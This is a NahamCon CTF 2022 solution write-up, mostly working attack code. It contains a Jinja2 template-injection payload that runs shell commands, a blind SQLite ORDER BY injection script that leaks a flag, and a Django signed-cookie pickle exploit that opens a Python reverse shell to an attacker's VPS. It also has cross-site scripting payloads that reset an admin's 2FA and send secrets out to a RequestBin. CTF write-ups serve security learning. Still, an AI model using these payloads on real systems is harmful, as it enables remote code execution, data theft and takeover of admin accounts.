name=taidh&email=taidh@cc{{joiner.__init__.__globals__.os.popen('cat${IFS}flag*').read()}}
(Jinja2 SSTI through the `email` field: the submitted value is rendered as a template, `joiner.__init__.__globals__` walks from a Jinja2 built-in to the `os` module its defining module imported, and `popen(...).read()` puts the command output into the page. `${IFS}` stands in for a space, presumably to get past a filter on spaces.)
NahamCon CTF 2022 - Solution
# SQLite Injection (ORDER BY) — blind boolean oracle, one flag character per request
import requests | |
import string | |
import re | |
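URL = "http://challenge.nahamcon.com:31423"  # Change URL
# First <td> of the first row is what the oracle reads; compiled once instead of per request.
RES_REGEX = re.compile(r'<td style="width:20%">(.*?)</td>')
# Digits added to the original letters + '_{}' so hex/numeric flag bodies can be recovered.
# Nothing in here may contain '"' — see order_payload().
CHARSET = string.ascii_letters + string.digits + '_{}'
MAX_LEN = 500  # upper bound on flag length; the loop normally stops much earlier


def order_payload(pos: int, char: str) -> str:
    """Build the ORDER BY expression used as a one-character oracle.

    When character ``pos`` (1-based, as SQLite's substr counts) of ``flag``
    equals ``char`` the rows are ordered by ``atomic_number``, otherwise by
    ``name``; the caller tells the two orderings apart from the first cell
    of the response. ``char`` is double-quoted: SQLite treats a double-quoted
    token that does not name a column as a string literal. ``char`` must not
    contain ``"`` or it breaks out of the literal.
    """
    return (f'(case when (substr((select flag from flag),{pos},1)="{char}") '
            'then atomic_number else name end)')


def leak_flag(url: str = URL, charset: str = CHARSET, max_len: int = MAX_LEN) -> str:
    """Recover ``flag`` one character at a time through the ORDER BY oracle.

    Stops at the first position where no candidate in ``charset`` matches
    (end of the flag, or a character outside ``charset``) rather than
    hammering the server for all ``max_len`` positions. Returns what was
    recovered so far. Progress is printed as it goes.
    """
    flag = ''
    session = requests.Session()  # reuse the connection across thousands of requests
    for pos in range(1, max_len):
        for char in charset:
            print(char, end='\r')
            data = {'search': 'a', 'order': order_payload(pos, char)}
            r = session.post(url, data=data)
            cells = RES_REGEX.findall(r.text)
            # A response with no table (error page, empty result) counts as
            # "no match" instead of raising IndexError as findall(...)[0] did.
            # NOTE(review): "12" in the first cell is assumed to identify the
            # atomic_number ordering (e.g. atomic number 12 first) — confirm
            # against the target's table before trusting a recovered flag.
            if cells and "12" in cells[0]:
                flag += char
                print(flag)
                break
        else:
            # Every candidate failed at this position: treat as end of flag.
            break
    return flag


if __name__ == "__main__":
    print(leak_flag())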
Find SECRET_KEY in the application's source on GitHub (it is Django's signing key; with it, session cookies can be forged).
Pickle serializer — recommended to use Django 4.0.4 (a version that still ships `PickleSerializer`; presumably the target's version, so the cookie format matches).
import os
import django.core.signing
import pickle
import base64
import django.contrib.sessions.serializers as serializers
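SECRET_KEY = '77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!'  # leaked from the app's GitHub source
# Salt used by Django's signed_cookies session backend; must match or the signature won't verify.
salt = 'django.contrib.sessions.backends.signed_cookies'
LHOST = "[I]"  # change to your VPS IP
LPORT = 4444   # must match the listener (nc -lvnp 4444)


def reverse_shell_command(lhost: str, lport: int) -> str:
    """Return the shell one-liner the target will run: a base64-wrapped Python reverse shell.

    The Python payload is built and base64-encoded here so the listener address no
    longer has to be edited by hand inside an opaque blob. ``lhost``/``lport`` are
    operator-supplied, not untrusted input, but they are spliced into a shell string,
    so keep them to a plain IP and port.
    """
    python_code = (
        "import socket,subprocess,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        f's.connect(("{lhost}",{lport}));'
        "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        'import pty; pty.spawn("/bin/sh")'
    )
    one_liner = f"python -c '{python_code}'"
    encoded = base64.b64encode(one_liner.encode()).decode()
    # base64 keeps the quote-heavy Python out of the outer shell command line.
    return f"echo {encoded} | base64 -d | sh"


class Command(object):
    """Pickle gadget: unpickling it calls ``os.system(cmd)`` on the server.

    ``__reduce__`` tells pickle to rebuild the object by calling the returned
    callable with the returned arguments, so the reverse shell fires during
    deserialization; no instance state is needed on the receiving side.
    """

    def __init__(self, cmd: str = ""):
        # Default: reverse shell to LHOST:LPORT, as in the original gist.
        self.cmd = cmd or reverse_shell_command(LHOST, LPORT)

    def __reduce__(self):
        return (os.system, (self.cmd,))


if __name__ == "__main__":
    # PickleSerializer is what makes this exploitable: the cookie is signed with the
    # leaked SECRET_KEY, so the server trusts it and unpickles the payload.
    # (This serializer was later deprecated/removed from Django, which is presumably
    # why the gist pins 4.0.4.)
    my_cookie = django.core.signing.dumps(
        Command(), key=SECRET_KEY, salt=salt,
        serializer=serializers.PickleSerializer, compress=True,
    )
    print(my_cookie)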
nc -lvnp 4444
on your VPS, then set the printed value as the `sessionid` cookie in your browser and load any page: the server unpickles the cookie and connects back to the listener.
There is an XSS in the feedback form (the payloads below presumably run in the admin's browser when the feedback is viewed).
- Leak the admin's 2FA secret
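<script>
// Runs in the victim's (admin's) browser via the feedback XSS: reset the admin's 2FA
// and exfiltrate the `url` field of the JSON response (presumably the otpauth
// provisioning URL carrying the new secret).
// encodeURIComponent matters here: that URL has its own `?secret=...&issuer=...`
// query, which unencoded would split the exfil request's query string at the RequestBin.
fetch('/reset2fa', {method: 'POST'})
  .then(r => r.json())
  .then(r => { fetch('http://[RequestBin]?cc=' + encodeURIComponent(r.url)); });
</script>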
Then add the received secret to Google Authenticator (account name admin) to generate valid OTPs for the admin.
- Read the admin's secret (needs a currently valid OTP)
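<script>
// Second stage through the same feedback XSS: call /show_secret with a valid OTP for
// the admin's now-known 2FA secret and exfiltrate the response body.
// The OTP is only good for its time window (presumably TOTP, 30 s), so generate it
// right before submitting the feedback. If the server compares it as a string,
// send it as a string so a leading zero is not lost.
fetch('/show_secret', {
  method: 'POST',
  headers: {
    'Accept': 'application/json',
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({otp: 680661, secretId: 1}) // change OTP
}).then(r => r.text()).then(r => {
  // encodeURIComponent instead of btoa: btoa throws on non-Latin-1 characters and
  // its '+' / '=' output is mangled inside a query string anyway.
  fetch('http://[RequestBin]?cc=' + encodeURIComponent(r));
});
</script>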